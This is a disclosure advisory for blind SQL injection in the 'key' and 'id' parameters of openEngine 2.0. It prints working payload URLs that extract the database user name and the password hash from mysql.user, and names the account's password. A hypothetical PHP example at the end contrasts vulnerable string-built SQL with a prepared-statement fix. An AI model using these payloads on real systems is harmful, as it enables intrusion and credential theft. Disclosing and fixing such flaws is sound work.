Title: openEngine 2.0 'key' Blind SQL Injection vulnerability
Author: Stefan Schurtz
Affected software: Successfully tested on openEngine 2.0 100226
Vendor: http://HdhCmsTestopenengine.de/

==========================
Overview:
==========================

The 'key' parameter in openEngine 2.0 is prone to a Blind SQL Injection

==================
Technical analysis
==================

# Database information

User: easy

# Blind SQL Injection:

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=2
-> "Sie möchten die Seite versenden."

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR 1=1
-> "Sie möchten die Seite Homepage (de) versenden."

# User-Guessing

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm&key=-1 OR ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121

=========
Solution:
=========

Targeted fix and input filtering

Title: openEngine 2.0 'id' Blind SQL Injection

==========================
Overview:
==========================

openEngine 2.0 contains a blind SQL injection flaw

==================
Technical analysis:
==================

Database information

User: easy
Password: easy (Hash: *E8F5FAE73EBB89AE362C59646600DDCD35EAD7E0)

Blind SQL Injection

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=1 AND ('a'='a&key= <- error
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND 1=0 AND ('a'='a&key= <- no error

User-Guessing

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),2,1)) = 101 AND ('a'='a <- error (e)
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),3,1)) = 97 AND ('a'='a <- error (a)
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),4,1)) = 115 AND ('a'='a <- error (s)
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(grantee AS CHAR),CHAR(32))) FROM information_schema.USER_PRIVILEGES LIMIT 4,1),5,1)) = 121 AND ('a'='a <- error (y)

Password(Hash)-Guessing

http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),1,1)) = 42 AND ('a'='a <- error (*)
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),2,1)) = 69 AND ('a'='a <- error (E)
http://HdhCmsTest2cto测试数据/openengine/cms/website.php?id=/de/sendpage.htm') AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(password AS CHAR),CHAR(32))) FROM mysql.user WHERE user=CHAR(101,97,115,121) LIMIT 0,1),3,1)) = 56 AND ('a'='a <- error (8)
... and so on

=========
Solution:
=========

Targeted fix and input filtering
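Added example to make the "targeted fix and input filtering" concrete; this is not openEngine's source (the advisory does not show it) but a hypothetical PHP page-lookup handler that splices the id and key request values into its SQL, beside the same lookup rewritten with PDO prepared statements and allow-list validation. The table and column names (pages, path, page_key) are assumptions.

```php
<?php
// Hypothetical reconstruction for illustration only, NOT openEngine's
// actual code. Table/column names (pages, path, page_key) are assumed.

// VULNERABLE: request values become part of the SQL text. A key of
// "-1 OR 1=1" rewrites the WHERE clause, and an id ending in
// "') AND ... AND ('a'='a" closes the quoted string and appends a
// condition; these are the boolean-based blind vectors in the advisory.
// The differing response text (or a database error) leaks one bit per
// request, which is how the user name and password hash were read out.
function lookupPageVulnerable(PDO $db, string $id, string $key): ?array
{
    $sql = "SELECT title FROM pages WHERE path = ('$id') AND page_key = $key";
    $res = $db->query($sql);                 // executes attacker-shaped SQL
    $row = $res ? $res->fetch(PDO::FETCH_ASSOC) : false;
    return $row === false ? null : $row;
}

// HARDENED: the SQL text is constant and the values travel as bound
// parameters, so OR/AND fragments and quote characters are plain data.
// The values are also checked against the shape the application expects
// (a language-prefixed .htm path and an integer key): the "filtering"
// half of the fix, applied as an allow-list rather than a blacklist.
function lookupPageSafe(PDO $db, string $id, string $key): ?array
{
    if (!preg_match('~^/[a-z]{2}/[A-Za-z0-9_.-]+\.htm\z~', $id)) {
        return null;                         // reject anything but a page path
    }
    if (filter_var($key, FILTER_VALIDATE_INT) === false) {
        return null;                         // reject non-integer keys
    }
    $stmt = $db->prepare(
        'SELECT title FROM pages WHERE path = :path AND page_key = :key'
    );
    $stmt->bindValue(':path', $id, PDO::PARAM_STR);
    $stmt->bindValue(':key', (int) $key, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Typical call from a website.php-style handler. Turning off emulated
// prepares makes MySQL itself bind the parameters server-side.
// $db = new PDO('mysql:host=localhost;dbname=<db>', '<db-user>', '<db-pass>',
//               [PDO::ATTR_EMULATE_PREPARES => false]);
// $page = lookupPageSafe($db, $_GET['id'] ?? '', $_GET['key'] ?? '');
```

Alongside the query fix, note that the advisory's password-hash extraction from mysql.user shows the CMS database account could read the MySQL privilege tables; restricting that account to its own schema limits what any future injection can reach.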